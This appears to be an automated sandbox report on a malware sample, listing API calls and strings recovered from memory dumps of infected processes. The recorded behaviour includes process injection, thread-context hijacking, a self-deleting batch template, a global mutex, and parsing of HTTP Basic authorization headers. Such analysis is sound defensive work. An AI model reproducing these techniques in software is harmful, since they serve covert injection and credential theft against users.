Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

CloseHandle.KERNEL32(?), ref: 00CD505E

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD6EFA, Relevance: 5.6, APIs: 3, Instructions: 34

APIs

socket.WS2_32(?,00000002,00000011), ref: 00CD6F09
bind.WS2_32 ref: 00CD6F25
closesocket.WS2_32 ref: 00CD6F30

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCF825, Relevance: 5.6, APIs: 1, Instructions: 19

APIs

InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00CCF82D

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF2968, Relevance: 5.6, APIs: 3, Instructions: 17

APIs

shutdown.WS2_32(?,00000002), ref: 00CF2976
closesocket.WS2_32(?), ref: 00CF297F
WSACloseEvent.WS2_32(?), ref: 00CF2992

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDE22A, Relevance: 5.6, APIs: 3, Instructions: 16

APIs

PathFindFileNameW.SHLWAPI(?), ref: 00CDE22E
PathRemoveExtensionW.SHLWAPI(?), ref: 00CDE242
CharUpperW.USER32(?,?,?,00CDE32B), ref: 00CDE24C

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD6A19, Relevance: 5.6, APIs: 2, Instructions: 32

APIs

HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?), ref: 00CD6A56

Part of subcall function 00CD692C: EnterCriticalSection.KERNEL32(00D03510,00000024,00CD699F,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD693C
Part of subcall function 00CD692C: LeaveCriticalSection.KERNEL32(00D03510,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD6966

HeapAlloc.KERNEL32(00000008,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00CD6A43

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE7011, Relevance: 5.5, APIs: 3, Instructions: 114

APIs

GetVersionExW.KERNEL32(00D02FD8), ref: 00CE702B
GetNativeSystemInfo.KERNEL32(?), ref: 00CE7167
memset.MSVCRT ref: 00CE719C

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDE4B6, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 81

APIs

Part of subcall function 00CC9F72: memcpy.MSVCRT ref: 00CC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CDE4E9

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

Part of subcall function 00CDE22A: PathFindFileNameW.SHLWAPI(?), ref: 00CDE22E
Part of subcall function 00CDE22A: PathRemoveExtensionW.SHLWAPI(?), ref: 00CDE242
Part of subcall function 00CDE22A: CharUpperW.USER32(?,?,?,00CDE32B), ref: 00CDE24C

Part of subcall function 00CE100A: RegDeleteValueW.ADVAPI32(00000000,00000000), ref: 00CE103A

Sleep.KERNEL32(000001F4), ref: 00CDE57E

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00CDE50A

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CC9A5B, Relevance: 5.5, APIs: 2, Instructions: 68

APIs

Part of subcall function 00CC99B5: CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000040), ref: 00CC99CD

CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00CC9ACA
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00CC9AEF

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE4159, Relevance: 5.5, APIs: 3, Instructions: 63

APIs

VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00CE4188

Part of subcall function 00CD6A7D: memcpy.MSVCRT ref: 00CD6A9C

WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00CE41C7

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00CE41EE

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE5594, Relevance: 5.5, APIs: 3, Instructions: 61

APIs

Part of subcall function 00CF537E: HttpQueryInfoA.WININET(?,40000009,?,?,00000000), ref: 00CF53E5
Part of subcall function 00CF537E: memset.MSVCRT ref: 00CF53FB

GetSystemTime.KERNEL32(?), ref: 00CE55BA

Part of subcall function 00CF046D: EnterCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF047A
Part of subcall function 00CF046D: LeaveCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF0488

Sleep.KERNEL32(000005DC), ref: 00CE55D3
WaitForSingleObject.KERNEL32(?,000005DC), ref: 00CE55DC

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD1AAE, Relevance: 5.5, APIs: 3, Instructions: 46

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00CD1ACA
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CD1AED
CloseHandle.KERNEL32 ref: 00CD1AFA

Part of subcall function 00CCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00CCE82F
Part of subcall function 00CCE826: DeleteFileW.KERNEL32(?), ref: 00CCE836

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD8162, Relevance: 5.5, APIs: 3, Instructions: 46

APIs

TlsAlloc.KERNEL32(00F5282C,00CD8636,?,?,?,?,00F52820,?), ref: 00CD816B
TlsGetValue.KERNEL32(?,00000001,00F5282C), ref: 00CD817D
TlsSetValue.KERNEL32(?,?), ref: 00CD81C2

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDDCF8, Relevance: 5.5, APIs: 3, Instructions: 33

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00CDDD10
CreateFileMappingW.KERNEL32(?,00000000,00000008,00000000,00000000,00000000), ref: 00CDDD24
CloseHandle.KERNEL32 ref: 00CDDD37

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF3CFF, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 26

APIs

StrCmpNA.SHLWAPI(Basic ,?,00000000), ref: 00CF3D14
lstrcmpA.KERNEL32(Basic ,?,00CE01C0,00000006,Authorization,?,?,?), ref: 00CF3D1E

Strings

Basic , xrefs: 00CF3D13 00CF3D1D

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD561F, Relevance: 5.4, APIs: 3, Instructions: 24

APIs

memset.MSVCRT ref: 00CD5639
TlsAlloc.KERNEL32(?,?,?,?,?,?,00CD1992,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CD5642
InitializeCriticalSection.KERNEL32(00D027DC), ref: 00CD5652

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDDCB8, Relevance: 5.4, APIs: 3, Instructions: 21

APIs

UnmapViewOfFile.KERNEL32 ref: 00CDDCC4
CloseHandle.KERNEL32 ref: 00CDDCD7
CloseHandle.KERNEL32 ref: 00CDDCED

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF042D, Relevance: 5.4, APIs: 3, Instructions: 19

APIs

InitializeCriticalSection.KERNEL32(00D030F4), ref: 00CF0437
QueryPerformanceCounter.KERNEL32(?), ref: 00CF0441
GetTickCount.KERNEL32 ref: 00CF044B

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF3C83, Relevance: 5.3, APIs: 2, Instructions: 26

APIs

StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00CF3C98
StrCmpIW.SHLWAPI(?,?), ref: 00CF3CA2

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD69B0, Relevance: 5.3, APIs: 1, Instructions: 9

APIs

Part of subcall function 00CD692C: EnterCriticalSection.KERNEL32(00D03510,00000024,00CD699F,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD693C
Part of subcall function 00CD692C: LeaveCriticalSection.KERNEL32(00D03510,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD6966

HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE2866, Relevance: 5.2, APIs: 4, Instructions: 191

APIs

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

memcpy.MSVCRT ref: 00CE29C9
memcpy.MSVCRT ref: 00CE29DC
memcpy.MSVCRT ref: 00CE29FD

Part of subcall function 00CE65F4: StrCmpNIA.SHLWAPI(?,nbsp;,00000005), ref: 00CE675C

Part of subcall function 00CD6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00CD6A43
Part of subcall function 00CD6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?), ref: 00CD6A56

memcpy.MSVCRT ref: 00CE2A6F

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CD6A7D: memcpy.MSVCRT ref: 00CD6A9C

Part of subcall function 00CE23E2: memmove.MSVCRT ref: 00CE2653
Part of subcall function 00CE23E2: memcpy.MSVCRT ref: 00CE2662

Part of subcall function 00CE26D6: memcpy.MSVCRT ref: 00CE274B
Part of subcall function 00CE26D6: memmove.MSVCRT ref: 00CE2811
Part of subcall function 00CE26D6: memcpy.MSVCRT ref: 00CE2820

Part of subcall function 00CDE61B: strcmp.MSVCRT(?,?,00000009,?,00000007,?,00000008,?,?,?,?,00000000,?,?,?,?), ref: 00CDE688

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD69C9, Relevance: 5.1, APIs: 2, Instructions: 32

APIs

HeapReAlloc.KERNEL32(00000000,?,?,?,00CF4E9D,00CC9851,?,?,00CF4FB1,?,?,?,?,?,?), ref: 00CD6A06

Part of subcall function 00CD692C: EnterCriticalSection.KERNEL32(00D03510,00000024,00CD699F,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD693C
Part of subcall function 00CD692C: LeaveCriticalSection.KERNEL32(00D03510,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD6966

HeapAlloc.KERNEL32(00000000,?,?,00CF4E9D,00CC9851,?,?,00CF4FB1,?,?,?,?,?,?,?,?), ref: 00CD69F3

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF046D, Relevance: 5.1, APIs: 2, Instructions: 14

APIs

Part of subcall function 00CF02BE: EnterCriticalSection.KERNEL32(00D03510,?,00CF0474,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF02CE
Part of subcall function 00CF02BE: LeaveCriticalSection.KERNEL32(00D03510,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF02F8

EnterCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF047A
LeaveCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF0488

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCE826, Relevance: 5.1, APIs: 2, Instructions: 12

APIs

SetFileAttributesW.KERNEL32(?,00000080), ref: 00CCE82F
DeleteFileW.KERNEL32(?), ref: 00CCE836

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD2FB7, Relevance: 5.1, APIs: 2, Instructions: 8

APIs

ReleaseMutex.KERNEL32 ref: 00CD2FBB
CloseHandle.KERNEL32 ref: 00CD2FC2

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCD7BE, Relevance: 5.1, APIs: 4, Instructions: 69

APIs

GetLastError.KERNEL32 ref: 00CCD810
EnterCriticalSection.KERNEL32 ref: 00CCD82D
memcpy.MSVCRT ref: 00CCD878
LeaveCriticalSection.KERNEL32(?,?,00000000,00000001), ref: 00CCD892

Part of subcall function 00CCD6C8: EnterCriticalSection.KERNEL32(?,?,?,?,00CCD979,00000001,?,00000000,?,?,?,00000000,00000000), ref: 00CCD6D2
Part of subcall function 00CCD6C8: memcpy.MSVCRT ref: 00CCD74E
Part of subcall function 00CCD6C8: memcpy.MSVCRT ref: 00CCD762
Part of subcall function 00CCD6C8: memcpy.MSVCRT ref: 00CCD78C
Part of subcall function 00CCD6C8: LeaveCriticalSection.KERNEL32(?,?,?,00000001,?,?,?,?,00CCD979,00000001,?,00000000,?,?,?,00000000), ref: 00CCD7B2

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Analysis Process: wscntfy.exe PID: 1640 Parent PID: 908

Executed Functions

Function 00AF07D0, Relevance: 16.1, APIs: 9, Instructions: 156

APIs

GetCurrentThreadId.KERNEL32 ref: 00AF07D6
memcpy.MSVCRT ref: 00AF0822
memset.MSVCRT ref: 00AF085A
GetThreadContext.KERNEL32(?,?), ref: 00AF0895
SetThreadContext.KERNEL32(?,?), ref: 00AF0900
GetCurrentProcess.KERNEL32 ref: 00AF0919
VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00AF093E
FlushInstructionCache.KERNEL32(?,?,0000007C), ref: 00AF0950

Part of subcall function 00AF0643: memset.MSVCRT ref: 00AF0654

Part of subcall function 00AF03FD: GetCurrentProcess.KERNEL32 ref: 00AF0400
Part of subcall function 00AF03FD: VirtualProtect.KERNEL32(3D920000,00010000,00000020,?), ref: 00AF0421
Part of subcall function 00AF03FD: FlushInstructionCache.KERNEL32(?,3D920000,00010000), ref: 00AF042A

ResumeThread.KERNEL32(?), ref: 00AF0992

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AF072F: GetCurrentThreadId.KERNEL32 ref: 00AF0730
Part of subcall function 00AF072F: VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00AF0767
Part of subcall function 00AF072F: ResumeThread.KERNEL32(?), ref: 00AF07A8

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF5BB5, Relevance: 14.8, APIs: 8, Instructions: 67

APIs

EnterCriticalSection.KERNEL32(00DB28B4,00DB28A8,?,00000001,00AFE48F,00000000,00AFE1B7,00000000,?,00000000,?,00000001,?,00B04E98,?,00000001), ref: 00AF5BBE
CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AF5BF7
DuplicateHandle.KERNEL32(000000FF,?,000000FF,00AFE48F,00000000,00000000,00000002), ref: 00AF5C16
GetLastError.KERNEL32(?,000000FF,00AFE48F,00000000,00000000,00000002,?,00000001,00AFE48F,00000000,00AFE1B7,00000000,?,00000000,?,00000001), ref: 00AF5C20
TerminateThread.KERNEL32 ref: 00AF5C28
CloseHandle.KERNEL32 ref: 00AF5C2F

Part of subcall function 00AF69C9: HeapAlloc.KERNEL32(00000000,?,?,00B14E9D,00AE9851,?,?,00B14FB1,?,?,?,?,?,?,?,?), ref: 00AF69F3
Part of subcall function 00AF69C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00B14E9D,00AE9851,?,?,00B14FB1,?,?,?,?,?,?), ref: 00AF6A06

LeaveCriticalSection.KERNEL32(00DB28B4,?,00000001,00AFE48F,00000000,00AFE1B7,00000000,?,00000000,?,00000001,?,00B04E98,?,00000001), ref: 00AF5C44
ResumeThread.KERNEL32 ref: 00AF5C5D

Part of subcall function 00AF6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?,?), ref: 00AF6A43
Part of subcall function 00AF6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?), ref: 00AF6A56

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B048F2, Relevance: 14.5, APIs: 5, Strings: 2, Instructions: 121

APIs

GetModuleHandleW.KERNEL32 ref: 00B04932

Part of subcall function 00AF0FC3: LoadLibraryA.KERNEL32 ref: 00AF1013

Part of subcall function 00AF1791: InitializeCriticalSection.KERNEL32(00B23510), ref: 00AF17B1
Part of subcall function 00AF1791: InitializeCriticalSection.KERNEL32 ref: 00AF17C6
Part of subcall function 00AF1791: memset.MSVCRT ref: 00AF17DB
Part of subcall function 00AF1791: TlsAlloc.KERNEL32(?,00000000,00B04986,?,?,00000001), ref: 00AF17F2
Part of subcall function 00AF1791: GetModuleHandleW.KERNEL32(?), ref: 00AF1817

WSAStartup.WS2_32(00000202,?), ref: 00B04998
CreateEventW.KERNEL32(00B22974,00000001), ref: 00B049BA

Part of subcall function 00AF500E: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00AF5020
Part of subcall function 00AF500E: GetTokenInformation.ADVAPI32(?,0000000C,00B22968,00000004,?), ref: 00AF5048
Part of subcall function 00AF500E: CloseHandle.KERNEL32(?), ref: 00AF505E

GetLengthSid.ADVAPI32(?,?,?,00000001), ref: 00B049EC

Part of subcall function 00B046CB: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B0470E

GetCurrentProcessId.KERNEL32 ref: 00B04A17

Part of subcall function 00B0472D: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00B04777
Part of subcall function 00B0472D: lstrcmpiW.KERNEL32(?,?), ref: 00B047A6

Part of subcall function 00B047E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00B04819
Part of subcall function 00B047E5: lstrcatW.KERNEL32(?,.dat), ref: 00B04879
Part of subcall function 00B047E5: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B0489E
Part of subcall function 00B047E5: ReadFile.KERNEL32(?,?,000001FE,?,00000000), ref: 00B048BB
Part of subcall function 00B047E5: CloseHandle.KERNEL32 ref: 00B048C8

Part of subcall function 00B040F3: IsBadReadPtr.KERNEL32 ref: 00B0412C

Strings

GetProcAddress, xrefs: 00B04941
LoadLibraryA, xrefs: 00B0494D

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B047E5, Relevance: 14.3, APIs: 5, Strings: 2, Instructions: 93

APIs

Part of subcall function 00AE9F72: memcpy.MSVCRT ref: 00AE9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00B04819

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

lstrcatW.KERNEL32(?,.dat), ref: 00B04879
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B0489E
ReadFile.KERNEL32(?,?,000001FE,?,00000000), ref: 00B048BB
CloseHandle.KERNEL32 ref: 00B048C8

Part of subcall function 00AF1905: EnterCriticalSection.KERNEL32(00DB1E90,00000000,?,?,?,?,00B048EB,?,?,00000000), ref: 00AF1913
Part of subcall function 00AF1905: GetFileVersionInfoSizeW.VERSION(00DB1EF0,?,?,?,?,?,00B048EB,?,?,00000000), ref: 00AF1933
Part of subcall function 00AF1905: GetFileVersionInfoW.VERSION(?,00000000,?,?,?,?,?,?,00B048EB,?,?,00000000), ref: 00AF1953
Part of subcall function 00AF1905: LeaveCriticalSection.KERNEL32(00DB1E90,?,?,?,?,00B048EB,?,?,00000000), ref: 00AF19D2

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00B0483A
.dat, xrefs: 00B0486D

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B1358E, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 64

APIs

InitializeSecurityDescriptor.ADVAPI32(00B22980,00000001), ref: 00B1359E
SetSecurityDescriptorDacl.ADVAPI32(00B22980,00000001,00000000,00000000), ref: 00B135AF
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00B135C5
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00B135E1
SetSecurityDescriptorSacl.ADVAPI32(00B22980,?,00000001,?), ref: 00B135F5
LocalFree.KERNEL32(?), ref: 00B13607

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 00B135C0

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF043B, Relevance: 12.6, APIs: 7, Instructions: 173

APIs

memset.MSVCRT ref: 00AF04EB
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00AF04FC
VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00AF0530
memset.MSVCRT ref: 00AF0570
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00AF0581
VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00AF05C1
memset.MSVCRT ref: 00AF062C

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF09C2, Relevance: 11.1, APIs: 5, Instructions: 210

APIs

GetCurrentThreadId.KERNEL32 ref: 00AF09D3

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

Part of subcall function 00AF043B: memset.MSVCRT ref: 00AF04EB
Part of subcall function 00AF043B: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00AF04FC
Part of subcall function 00AF043B: VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00AF0530
Part of subcall function 00AF043B: memset.MSVCRT ref: 00AF0570
Part of subcall function 00AF043B: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00AF0581
Part of subcall function 00AF043B: VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00AF05C1
Part of subcall function 00AF043B: memset.MSVCRT ref: 00AF062C

Part of subcall function 00AE9BA9: SetLastError.KERNEL32(0000000D), ref: 00AE9BE4

memcpy.MSVCRT ref: 00AF0B42
memset.MSVCRT ref: 00AF0BA8
VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00AF0BBD
GetLastError.KERNEL32(?,00000040,?,?,?,00000000), ref: 00AF0BC7

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AF0643: memset.MSVCRT ref: 00AF0654

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0582C, Relevance: 9.2, APIs: 3, Strings: 1, Instructions: 38

APIs

EnterCriticalSection.KERNEL32(00B23510,?,?,?,00AFE9BA), ref: 00B05842
LeaveCriticalSection.KERNEL32(00B23510,?,?,?,00AFE9BA), ref: 00B05868

Part of subcall function 00B0575A: memset.MSVCRT ref: 00B05774
Part of subcall function 00B0575A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00B057BA

CreateMutexW.KERNEL32(00B22974,00000000,Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}), ref: 00B0587A

Part of subcall function 00AF2F31: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AF2F37
Part of subcall function 00AF2F31: CloseHandle.KERNEL32 ref: 00AF2F49

Strings

Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}, xrefs: 00B0586F

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFF7DB, Relevance: 7.7, APIs: 5, Instructions: 217

APIs

LoadLibraryW.KERNEL32(?), ref: 00AFF838
GetProcAddress.KERNEL32(?,?), ref: 00AFF860
StrChrA.SHLWAPI(?,00000040), ref: 00AFF987

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

StrChrW.SHLWAPI(?,00000040,?,?), ref: 00AFF968

Part of subcall function 00B0C3E0: lstrlenW.KERNEL32(00AE7C5C), ref: 00B0C3FC
Part of subcall function 00B0C3E0: lstrlenW.KERNEL32(?), ref: 00B0C402
Part of subcall function 00B0C3E0: memcpy.MSVCRT ref: 00B0C426

FreeLibrary.KERNEL32 ref: 00AFFA6D

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF1905, Relevance: 7.2, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(00DB1E90,00000000,?,?,?,?,00B048EB,?,?,00000000), ref: 00AF1913

Part of subcall function 00AF3764: GetModuleHandleW.KERNEL32(?), ref: 00AF3780
Part of subcall function 00AF3764: GetModuleHandleW.KERNEL32(?), ref: 00AF37BB

GetFileVersionInfoSizeW.VERSION(00DB1EF0,?,?,?,?,?,00B048EB,?,?,00000000), ref: 00AF1933
GetFileVersionInfoW.VERSION(?,00000000,?,?,?,?,?,?,00B048EB,?,?,00000000), ref: 00AF1953

Part of subcall function 00B14D77: GetCommandLineW.KERNEL32 ref: 00B14E01
Part of subcall function 00B14D77: CommandLineToArgvW.SHELL32 ref: 00B14E08
Part of subcall function 00B14D77: LocalFree.KERNEL32 ref: 00B14E48
Part of subcall function 00B14D77: GetModuleHandleW.KERNEL32(?), ref: 00B14E8A

Part of subcall function 00AEBBAD: VerQueryValueW.VERSION(?,00AE75E4,?,?,00DB1E90,?,00AF1983,?,?,?,?,?,?,00B048EB), ref: 00AEBBCE
Part of subcall function 00AEBBAD: GetModuleHandleW.KERNEL32(?), ref: 00AEBC0F

Part of subcall function 00AFD8C0: GetModuleHandleW.KERNEL32(?), ref: 00AFD8DD

Part of subcall function 00AEE2C1: EnterCriticalSection.KERNEL32(00B23510,00DB1E90,00AF198D,?,?,?,?,?,?,00B048EB,?,?,00000000), ref: 00AEE2D1
Part of subcall function 00AEE2C1: LeaveCriticalSection.KERNEL32(00B23510,?,?,?,?,?,?,00B048EB,?,?,00000000), ref: 00AEE2F9

Part of subcall function 00AED987: InitializeCriticalSection.KERNEL32 ref: 00AED9B5
Part of subcall function 00AED987: GetModuleHandleW.KERNEL32(?), ref: 00AEDA1C

